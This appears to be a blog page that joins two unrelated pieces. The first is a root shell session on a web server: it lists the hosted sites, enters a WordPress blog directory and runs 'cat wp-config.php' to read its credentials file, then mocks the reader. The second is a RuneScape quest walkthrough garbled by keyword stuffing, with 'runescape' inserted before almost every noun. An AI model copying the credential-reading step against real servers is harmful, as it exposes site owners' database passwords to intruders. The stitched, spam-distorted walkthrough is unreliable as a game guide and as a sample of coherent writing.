drwxr-xr-x 2 eira eira 4096 2011-06-13 10:09 dompdf
drwxr-xr-x 2 eira eira 4096 2008-08-26 12:17 easygadget
drwxr-xr-x 11 eira eira 4096 2011-07-07 02:56 ecolo
drwxr-xr-x 25 eira eira 4096 2011-06-07 03:18 eira
drwxr-xr-x 7 eira eira 4096 2009-04-22 06:45 erboristeria
drwxr-xr-x 3 root root 4096 2008-03-14 07:48 error
drwxr-xr-x 3 root root 4096 2008-01-24 10:45 html
-rw-r--r-- 1 root root 4229120 2007-05-05 16:24 html.tar
drwxr-xr-x 3 root root 4096 2008-05-24 04:10 icons
drwxr-xr-x 4 eira eira 4096 2006-11-18 16:19 img
-rw-r--r-- 1 root root 12584960 2007-05-05 16:24 img.tar
drwxr-xr-x 7 eira eira 4096 2010-03-05 02:10 irontrader
drwxr-xr-x 15 eira eira 4096 2010-07-14 05:43 kitepower
drwxr-xr-x 14 root root 12288 2008-03-14 07:48 manual
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 mauri
-rw-r--r-- 1 root root 20480 2007-05-05 16:24 mauri.tar
drwxr-xr-x 2 eira eira 4096 2009-05-17 06:43 mdarredamenti
drwxr-xr-x 17 eira eira 4096 2011-10-09 06:53 miniatures
drwxr-xr-x 10 eira eira 4096 2009-05-07 12:50 molino
drwxr-xr-x 18 eira eira 4096 2011-06-25 03:32 pavimenti
drwxr-xr-x 6 eira eira 4096 2011-06-25 18:02 supportservice
drwxr-xr-x 9 eira eira 4096 2010-08-08 12:59 trieste
drwxr-xr-x 3 eira eira 4096 2008-07-14 13:39 ts_affitta
drwxr-xr-x 2 webalizer root 12288 2011-10-01 04:22 usage
drwxr-xr-x 6 eira eira 4096 2007-01-02 07:24 virtualftp
drwxr-xr-x 14 eira eira 4096 2011-06-24 11:59 westistramodus
drwxr-xr-x 2 eira eira 4096 2010-03-01 03:31 wip
[root@mail www]# cd mauri
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php
drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# ls -al
total 84
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 .
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 ..
drwxrwxr-x 2 eira eira 4096 2008-02-15 13:47 ~atc
drwxrwxr-x 2 eira eira 4096 2007-11-26 16:04 avatar
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 blog
drwxrwxr-x 2 eira eira 4096 2011-05-30 08:11 DOM_PDF
drwxr-xr-x 2 eira eira 4096 2008-03-13 10:05 file
-rw-r--r-- 1 eira eira 4356 2007-08-14 11:37 index.html-1
-rw-r--r-- 1 eira eira 4565 2007-10-08 11:48 index.html-2
-rw-rw-r-- 1 eira eira 2217 2011-04-05 04:22 index.php
-rw-r--r-- 1 eira eira 4697 2007-10-08 11:56 index.php-1
-rw-r--r-- 1 eira eira 224 2008-06-06 18:06 ip.php
drwxrwxr-x 2 eira eira 4096 2008-03-13 09:37 lib
drwxr-xr-x 3 eira eira 4096 2010-05-06 05:40 PHP_PDF
drwxrwxr-x 2 eira eira 4096 2009-05-20 07:22 prove_cetekor
drwxrwxr-x 3 eira eira 4096 2008-06-23 12:46 prove_G45v
drwxr-xr-x 2 eira eira 4096 2007-10-08 11:46 styles
[root@mail mauri]# cd blog
[root@mail blog]# ls -al
total 252
drwxrwxr-x 5 eira eira 4096 2008-02-16 04:53 .
drwxr-xr-x 12 eira eira 4096 2011-05-30 05:06 ..
-rw-r--r-- 1 eira eira 186 2008-02-16 04:51 .htaccess
-rw-r--r-- 1 eira eira 94 2006-11-19 01:56 index.php
-rw-r--r-- 1 eira eira 15127 2003-04-01 07:12 license.txt
-rw-r--r-- 1 eira eira 7635 2007-08-28 13:01 readme.html
drwxr-xr-x 7 eira eira 4096 2008-02-04 22:06 wp-admin
-rw-r--r-- 1 eira eira 33489 2007-12-27 18:47 wp-app.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-atom.php
-rw-r--r-- 1 eira eira 997 2007-05-09 10:18 wp-blog-header.php
-rw-r--r-- 1 eira eira 2923 2007-07-04 10:12 wp-comments-post.php
-rw-r--r-- 1 eira eira 153 2007-08-02 18:45 wp-commentsrss2.php
-rw-r--r-- 1 eira eira 947 2007-10-22 07:05 wp-config.php
-rw-r--r-- 1 eira eira 965 2007-05-12 12:29 wp-config-sample.php
drwxr-xr-x 6 eira eira 4096 2008-02-04 22:06 wp-content
-rw-r--r-- 1 eira eira 851 2007-08-02 18:45 wp-cron.php
-rw-r--r-- 1 eira eira 120 2006-11-19 01:56 wp-feed.php
drwxr-xr-x 4 eira eira 4096 2008-02-04 22:06 wp-includes
-rw-r--r-- 1 eira eira 1525 2007-09-23 13:25 wp-links-opml.php
-rw-r--r-- 1 eira eira 16654 2007-09-25 17:17 wp-login.php
-rw-r--r-- 1 eira eira 5587 2007-12-29 13:38 wp-mail.php
-rw-r--r-- 1 eira eira 296 2007-09-18 16:23 wp-pass.php
-rw-r--r-- 1 eira eira 190 2007-08-02 18:45 wp-rdf.php
-rw-r--r-- 1 eira eira 251 2006-10-11 03:26 wp-register.php
-rw-r--r-- 1 eira eira 129 2007-08-02 18:45 wp-rss2.php
-rw-r--r-- 1 eira eira 127 2007-08-02 18:45 wp-rss.php
-rw-r--r-- 1 eira eira 10834 2007-12-20 20:57 wp-settings.php
-rw-r--r-- 1 eira eira 3520 2007-08-02 18:45 wp-trackback.php
-rw-r--r-- 1 eira eira 61403 2008-02-04 12:52 xmlrpc.php
[root@mail blog]# cat wp-config.php
....Etc....I think you get the fish.
Thursday, September 29, 2011
Ritual of the Mahjarrat Step-by-step quest guide
- Description of the Ritual of the Mahjarrat quest in RuneScape:
- They signal their arrival with a devastating shriek, and leave nothing but ash, flame and destruction in their wake. All tremble in fear as they approach, and the runescape ground rumbles in sympathy.
- Word of an attack on the runescape isle of Mos Le'Harmless has reached the runescape ears of Sir Tiffy Cashien. Should you choose to accept his request, you will be sent to aid Sir Tendeth who has come across a great threat to the runescape world; one far greater than the runescape pirates he was originally sent to investigate.
- Do you have the runescape stomach to investigate this new threat, and see it through to the runescape end? Or will you leave the runescape world to its doom while you cower in fear?
- Difficulty:
- Grandmaster
- Length:
- Very, Very Long
- Quest Requirements:
- The Temple at Senntisten
- While Guthix Sleeps
- Hazeel Cult
- Enakhra's Lament
- Slug Menace
- Fairy Tale Part III - Battle at Orks Rift, A
- Rocking Out
- Tail of Two Cats, A
- Fight Arena
- Skill/Other Requirements:
- 77 Agility
- 76 Crafting
- 76 Mining
- Items Needed at Quest Start:
- None.
- Items Needed to Complete Quest:
- Ring of Visibility, Rope, and Catspeak amulet (e)
- Items Recommended for Quest:
- Lots of food and combat gear.
- Items Acquired During Quest:
- Bob's collar, Note to you, Note to Robert, Tetrahedron 1, Tetrahedron 2, Tetrahedron 3, Tetrahedron 4, Robert's necklace, Statue arm, Steel pickaxe, Strange device, Kethsian key, Scroll, Dathana's message, 4 Teleorbs, 4 Beacons, Arrav's heart, Chisel, Spade, Decoder strips, Code key (main entrance), Code key (storeroom), Code key (reliquary), Heart magic notes, Heat globe.
- Quest Points:
- 3
- Reward:
- 110K Agility XP, 60K Constitution XP, 40K Crafting XP, 40K Mining XP, three 80K XP Lamps, access to fight a new Barrows brother and gain new Barrows equipment, access to mine Bane ore, access to the runescape new lunar spell Tune Bane Ore, ability to make Bane arrows and bolts, the runescape ability to gain combat bonuses in certain areas, access to fight Glacors, ability to runecraft Armadyl runes, ability to create an Armadyl staff to enhance the runescape Storm of Armadyl spell, and a bonus 3K Prayer XP.
- Start Point:
- Falador Park.
- To Start:
- Speak to Sir Tiffy Cashien in the runescape Falador Park.
- Instructions:
- Head to Falador park and speak to Sir Tiffy Cashien sitting on the runescape park bench. Ask him about the runescape Ritual of the runescape Mahjarrat and he will inform you of the runescape worrying information from his contact, Sir Tendeth, currently located in the runescape Other Inn on Mos Le'Harmless.
- NOTE: If you accept the runescape quest and continue with the runescape conversation Sir Tiffy will offer you a free teleport to Mos Le'Harmless. If you walk away after starting the runescape quest you will have to make your own way to the runescape island. the runescape fastest way to do this is the runescape Ectophial teleport to the runescape Ectofuntus, followed by Captain Teach's ship from Port Phasmatys.
- Speak to Sir Tendeth in the runescape inn and he will tell you that this has nothing to do with pirates but a greater foe. A small cut-scene will occur once you select to continue with the runescape quest.
- Head north towards the runescape jungle to try to discover the runescape mysterious beast that has been causing the runescape destruction - food and energy restore methods are recommended for this part. Upon entering the runescape jungle a cut-scene will occur, causing Sir Tendeth to be killed by a ball of fire from the runescape east.
- Using the runescape vegetation as cover, move in an easterly direction, following the runescape trail of scorch marks. Valid cover includes the runescape large tropical trees, small trees and the runescape burnt trees (these last show only as tiny white dots on the runescape minimap). You have to be on a square directly to the runescape west of these trees to be safe from the runescape fireballs. If you are hit by a fireball you will be dealt around 275 LP of damage and be returned to the runescape entrance of the runescape jungle to start all over again.
- The attacks are originating from a triangle of trees just past the runescape Trouble Brewing minigame. Once you reach this area a cutscene will occur showing three beasts planning their assault on a greater population of people. You must notify Sir Tiffy of what you have seen, so teleport back to Falador and speak to him in the runescape park.
- Sir Tiffy will ask you to describe the runescape creatures you saw, before teleporting you to the runescape research area of the runescape White Knights. Speak to Sir Tiffy or Lady Table and a discussion will ensue where Lady Table will research your description and confirm the runescape creatures to be Dragonkin. She also has notes about the runescape Dragonkin referring to Robert the runescape Strong, who you know to be now reincarnated as Bob the runescape Cat, and also of a Stonetoucher, who you know to be yourself after touching the runescape Stone of Jas during While Guthix Sleeps. They suggest you go find Bob the runescape Cat and borrow his collar to find out how to access the runescape plain of Kethsi.
- Bob the runescape Cat can be located anywhere on the runescape mainland of Gielinor. Use your Catspeak amulet (e) to track him down. Once you have tracked down Bob, speak to him whilst wearing your amulet and ask to see his collar. Study the runescape collar and flip it over to find the runescape code: DIRAKS.
- Head to the runescape nearest or most convenient fairy ring and enter the runescape code D I R followed by A K S to arrive in Kethsi.
- Head north west and search the runescape rubble next to a wall mural to find Tetrahedron 4.
- Climb up the runescape ramp towards the runescape eastern side, and head north to find a wall design. Investigate this to view the runescape design in detail and notice that the runescape patterns match those on Bob's collar.
- Use Bob's collar on the runescape wall design to start a small puzzle where the runescape collar is a missing piece and the runescape patterns have to match up. the runescape collar should be placed between the runescape two decorative panels on the runescape right by being flipped and rotated until correct. After this a secret compartment will open up giving the runescape player five new items: Note to you, Note to Robert, Tetrahedron 1, Robert's necklace, and a statue arm.
- Head south west by jumping over the runescape ledge near the runescape ramp and
- Use the runescape statue arm on the runescape broken statue nearby. A fallen spire should appear allowing you passage to the runescape other side.
- Head down the runescape ladder and run up the runescape wall to the runescape east. Once on the runescape platform, climb up the runescape wall to the runescape top of the runescape tower.
- Swing on the runescape poles to the runescape other side before cartwheeling along the runescape beam and jumping the runescape gap to the runescape next ledge.
- Jump across another gap and climb down the runescape ladders to ground level. Crawl through the runescape pipe to the runescape north.
- Take the runescape nearby pickaxe and mine through the runescape rocks blocking your path, before climbing up the runescape wall to the runescape platform.
- Run across the runescape northern wall and repeat to cross a second one after you land. Climb across the runescape handholds and head down the runescape ladder to the runescape sand.
- Run northwest out of the runescape ruins and then east along the runescape coastline until you find some rubble. Search it for Tetrahedron 3 and a Strange device.
- Head back ro the runescape northwest ruins, climb up the runescape ladders to the runescape top of the runescape tower, jump across the runescape gap and finally slide down the runescape roof.
- Head south and ignore the runescape steps leading underground for now. Cross the runescape plank to the runescape small island and search the runescape rubble for Tetrahedron 2.
- Head back across the runescape plank and enter the runescape foyer of the runescape underground area. Use all 4 of your Tetrahedrons on the runescape indentations on the runescape wall and note down the runescape code you are given. You can open your quest journal to find out the runescape code at any time if you forget it.
- Go outside and use the runescape check-output option of the runescape strange device. You will see different code readings at different locations. Walk around the runescape area of Kethsi checking the runescape output as you go along until it matches to your quest journal. Once you've found the runescape location, use your Spade to dig and receive a Kethsian key. Head back to the runescape cave by redoing various parts of the runescape course.
- Open the runescape door with the runescape key, head inside, and search the runescape south bookshelves for a book and the runescape southeast corner for a scroll. Reading the runescape scroll will unlock a new lunar spell: Tune Bane Ore. Next read the runescape book titled Dathana's message.
- When you are finished, teleport back to Sir Tiffy Cashien in Falador park to report your findings. He will tell you to involve the runescape While Guthix Sleeps crew into your findings as they know about the runescape Stone of Jas and may be able to help you.
- Head to Falador castle and speak to Akrisae, Idria or Thaerisk. the runescape group will try to work out a way to stop Lucien and the runescape Dragonkin. Ali the runescape Wise arrives on the runescape scene during the runescape discussion. He interrupts you to suggest using one Mahjarrat to defeat and trick Lucien, another Mahjarrat. Akrisae will oppose this plan and you must convince him to follow through with it. They suggest you head to Ghorrock and give you some teleorbs to plant on the runescape Stone the runescape Jas. Ali the runescape Wise will suggest you hide Arrav's heart somewhere on the runescape ritual site for later use.
- Before heading to Ghorrock, travel to Senntisten located at the runescape Digsite and speak to Azzanadra. He will accept the runescape offer of you aiding not only him, but him also aiding you and your team against Lucien. He will give you four Beacons.
- The safest route to your location is to travel to the runescape Fremmenik hunter area using the runescape fairy ring code D K S and take the runescape canoe that's located northwest from the runescape fairy ring. When the runescape canoe journey ends, head east past the runescape ice block to enter Ghorrock castle. This route enables you to avoid the runescape Wilderness and any potential dangers it may hold.
- Alternatively, if you are feeling brave, you can travel through the runescape Wilderness to the runescape temple located in the runescape Ice Plateau and squeeze past the runescape ice block.
- NOTE: An anti-dragon shield or dragonfire shield and an Antifire potion is recommended once you pass the runescape ice blocks as there are metal dragons in this area.
- Once inside head towards the runescape middle of the runescape south wall. Climb over the runescape fallen pillar and enter the runescape tunnel beyond.
- You will end up in an ice area with undead broavs patrolling and you must avoid them by staying hidden. If you get caught you will be teleported to a prison. To escape, search the runescape bed to find a Chisel and Spade. Lift the runescape floor tile, dig the runescape soil, and climb through the runescape hole.
- Head east to where you were captured. You must run around the runescape area placing the runescape four beacons at exact opposite ends of each other on the runescape northern, eastern, southern and western side in the runescape dead trees in the runescape area.
- Next place Arrav's heart in a rock south of the runescape ritual stone at the runescape center of the runescape area.
- Head north west and tie the runescape Rope to the runescape overhanging tree to allow the runescape rest of your team to safely gain access to the runescape area.
- Head south towards the runescape castle and kill the runescape Armoured zombie near the runescape entrance to obtain Decoder strips and Code key (Main entrance). You need to use the runescape strips and code to deduce the runescape pin to the runescape door. Use the runescape strips on their corresponding letters and enter the runescape 4 digits that are highlighted, first from strip 1, then strip 2 etc. This is the runescape same puzzle that you faced in the runescape Curse of Arrav. Once unlocked, enter the runescape door and you will be inside the runescape base.
- Head north east and search the runescape crate to obtain Code key (Storeroom) and then go west and open the runescape door, this time using the runescape letters from the runescape newest code key. Head north into the runescape next room and search the runescape crate to find Code key (reliquary) and Heart magic notes.
- Leave the runescape storeroom, head up the runescape eastern staircase, and open the runescape door using your reliquary key code. Enter the runescape room and head south to find a black stone on a pillar. Smash this stone and leave the runescape room.
- Leave the runescape castle and head to Movario who is located far east of the runescape castle. He will inform you that he senses some shadow magic in the runescape area, which may be concealing the runescape Stone of Jas.
- Head west of Movario while weilding a Ring of visibility and you will see a Shadow pedestal. There is a cave, it's entrance blocked by a wall of ice, to the runescape south of the runescape pedestal.
- Head north, leave the runescape area, and run north into Ghorrock castle. Climb up the runescape western stairs and down stairs on the runescape other side. Climb up the runescape eastern wall, walk around to the runescape northwest corner and climb down the runescape western wall. Turn on Protect from Magic as you enter the runescape castle. Run all the runescape way west, then all the runescape way south to pick up the runescape Heat globe on the runescape floor.
- Return to the runescape Shadow pedestal and use the runescape Heat globe on it. the runescape wall of ice blocking the runescape way will thaw. Do not enter the runescape cave until you have read the runescape section below and are ready to fight.
- The Battles:
- Now is the runescape time to go and get ready for combat. Once you touch the runescape Stone of Jas you will trigger a series of cutscenes alternated with battles. You cannot leave the runescape area and will die if you aren't prepared to fight.
- Please read the runescape following steps BEFORE you engage in combat with Lucien's minions!
- You will find yourself in an ice cave. Head south to discover the runescape Stone of Jas, touch it, and a very interesting cutscene will play with its own cinematic music! the runescape Stone of Jas boosts your combat stats significantly, so super sets are NOT needed. It is NOT recommended to use Saradomin Brews, as they will lower your boosted stats. Use rocktails or sharks instead. If you have a familiar that can attack, it will be able to deal high damage as well due to the runescape boost from the runescape Stone of Jas. It may be highly beneficial to bring a Spirit Kyatt with Ambush scrolls, as its attacks will most likely deal a lot of damage. For those with 88 summoning and above, Unicorn Stallions are useful for healing, otherwise, rocktails or sharks will do just fine. Once again, using Saradomin Brews for healing is NOT recommended. Finally, do bring a couple of Prayer potions, as you will be using Protect from Melee and Protect from Magic in different fights.
- You will go through four waves of combat against Lucien's minions. If you happen to die during one of these waves, you will be able to resume fighting from that battle; in other words, you won't have to start over. Furthermore, your gravestone will appear in the runescape area you arrived by. If you arrived at the runescape Ice Plateau by canoe, your grave will appear at the runescape base of the runescape rope tied to the runescape overhanging tree.
- Boss Fight I - General Khazard (level 250):
- After the runescape cutscene ends, an alarm will be activated around the runescape Stone of Jas causing you to be teleported out of the runescape cave to your backup, where you will be ambushed by General Khazard. He reveals Ali the runescape Wise to be a Mahjarrat known as Wahisietel. You must decide whether or not you suspected Ali the runescape Wise. You must now fight General Khazard, and although you are aided by the runescape Stone of Jas, you will still face great danger.
- General Khazard's combat level is 250, and uses magic attacks; therefore, using Protect from Magic prayer is recommended. General Khazard also occasionally summons a dog familiar, Bouncer, to attack you. You will NOT be able to attack Bouncer, but you can lure it towards one of your NPC allies, preferably Wahisietel, who will be able to kill Bouncer in one hit. Once General Khazard is nearly dead, a short cut-scene will occur that shows him teleporting away, and allowing you to continue your journey.
- Boss fight II - Enhanced Ice Titans (level 275):
- It is not long before you bump into Lucien himself, who is extremely difficult to defeat due to him summoning four Enhanced ice titans to aid him. These titans have devastating attacks, but you are only required to kill TWO of them. You can ignore Lucien, but avoid his shadow spell as it can deal consistant damage. To avoid his magic, move two or more steps away from the runescape spell before it lands on you. the runescape shadow spell can hit up to 150 life points five times, and hits through prayer! While attacking the runescape titans, be sure to move around a bit to avoid any close calls.
- You can attack the runescape two titans with either melee or range. If using melee, be sure to use Protect from Melee while facing them. You will be frozen randomly by the runescape giants in a big block of ice. As soon as you are frozen, try to move around as quickly as possible in order to break through the runescape ice. If successful, you will not take any damage. If using range, you can lure the runescape titans into the runescape trees nearby to trap them. Long-ranged style of attack is recommended. Do keep an eye out for Lucien's shadow spell! Once the runescape two titans are killed, a cut-scene will occur.
- Boss fight III - Ice Demons (level 300):
- Lucien will now summon a horde of Ice demons to kill you. Like the runescape ice titans, you only need to kill TWO demons. However, they use magic and ranged attacks, and it's strongly recommended to use Protect against Magic, as their magic attacks are dangerous. Because you are Praying against Magic, make sure your armor has good range defence. the runescape demons can shoot icicles from the runescape ground to trap you. They do not hurt you, but they can hinder your movement. You can attack the runescape icicle traps within 2-3 hits, but if trapped and hit by Lucien's shadow spell, you will take a lot of damage! Keep moving to evade Lucien's spell and stop yourself getting trapped by the runescape icicles. Once you have defeated two of these monsters, you will end up outside of the runescape iced area.
- Boss fight IV - Arrav (level 250):
- Re-enter the runescape tunnel to start the runescape cutscene where Lucien will decide who to sacrifice in the runescape ritual. A lot of Mahjarrat will appear and an argument will break out. Lucien decides Jhallan shall be the runescape one to die, but a fight breaks out again. Kill the runescape Armoured zombies that are summoned and another cutscene will occur, showing Arrav being summoned to fight the runescape Barrows brothers. You must attract Arrav's attention by attacking him until he decides to attack you, and then lead him over towards the runescape rock where you earlier concealed his heart. Run around the runescape rock until a chat box occurs where he will realize who he really is and attack Zemouregal.
- As Zemouregal is being killed, he will realize that Lucien will not save him, thus he will turn on Lucien. Additionally, he will start the runescape ritual to rejuvenate the runescape Mahjarrat. Together the runescape Mahjarrat will attack Lucien but will not fully succeed. A cutscene will show the runescape Dragonkin come back and become angry at Lucien for abusing the runescape Stone of Jas. They destroy him and warn the runescape rest of the runescape Mahjarrat who will panic and teleport away. Idria will also be killed. the runescape cutscene continues with Sliske turning Akrisae into a Barrows brother. Sir Tiffy suggests that the runescape stone be hidden so it cannot be found again, and will summon Thaerisk Cemphier to help hide it. the runescape cutscene then continues with you entering a trance and being chased through Draynor Village by the runescape Dragonkin with Sir Tiffy, while those who have fallen to Lucien watch on. Finally the runescape cutscene will end and you will arrive in Falador park. Speak to Sir Tiffy Cashien to claim your reward.
Subscribe to:
Posts (Atom)
